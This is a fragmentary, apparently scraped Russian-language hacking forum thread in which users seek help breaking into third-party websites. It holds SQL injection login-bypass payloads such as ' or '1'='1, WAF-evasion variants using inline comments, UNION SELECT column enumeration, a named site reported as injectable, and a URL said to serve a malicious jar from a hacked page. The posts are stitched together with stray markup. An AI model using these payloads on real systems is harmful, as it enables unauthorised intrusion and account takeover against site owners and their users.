Нашел Xss в input.

Фильтруется
[/CODE]

Добрый день.

Есть логин-форма.

При подстановке кавычки в любое из полей выдается:

MySQL-Error блаблабла

SQL Query:

SELECT user_id FROM users WHERE (BINARY _user_name = BINARY 'логин') AND (BINARY password = BINARY 'пасс')

логин и пасс - то что вводится в соответствующие поля, со всеми скобками, кавычками и пр., т.е. все спецсимволы в запросе не обрабатываются, а пролетают как текст.

Ну если ввести в оба поля admin' or 1=1 -- то на выходе и будет

SQL Query:

SELECT user_id FROM users WHERE (BINARY user_name = BINARY 'admin' or 1=1 --') AND (BINARY password = BINARY 'admin' or 1=1 --')

если кавычку заменить на %27, то SQL-ошибка не появляется, просто ответ "неверный пароль".

Как тут можно в эту BINARY инжектнуться?

Всем доброго дня, взломали один сайт, поместили в него фрейм с ссылкой на это место - http://nncc.1dumb.com/main.php?page=5f7bf430541a94ae

я так понимаю загружается jar с инструкциями к исполнению и алгоритмом расшифровки контента, далее создается файл и что то выполняет, так как jar файл без какой либо подписи он ни исполняется. У меня вопрос, если бы он исполнился все же что бы произошло?

Всем добрый день.

Помогите пожалуйста, вроде бы инъекция есть, а раскрутить не могу...

http://powerdefence.ru/Uslugi_dlya_Yur_lic'

Как обойти фаервол / фильтр при проведение SQL-инъекции?

Запросы вида: =-1'+order+by+10+--+

=-1'/*--*/order/*--*/by/*--*/10--

=-1'+OrDer+By+10+--+

При всех этих запросах пишет: Соединение было сброшено

2 s000r: Нет тут sql injection (http://powerdefence.ru/Uslugi_dlya_Yur_lic')

2 aydin-ka:

=-1'/**//*!order*//**//*!by*//**/10--+

Так пробовал? Все зависит от того, где именно происходит фильтрация.

Пробуй GROUP BY

или тупо

UNION SELECT 1 --

UNION SELECT 1,2 --

UNION SELECT 1,2,3 --

UNION SELECT 1,2,3,......,N --

В оба поля: ' or '1'='1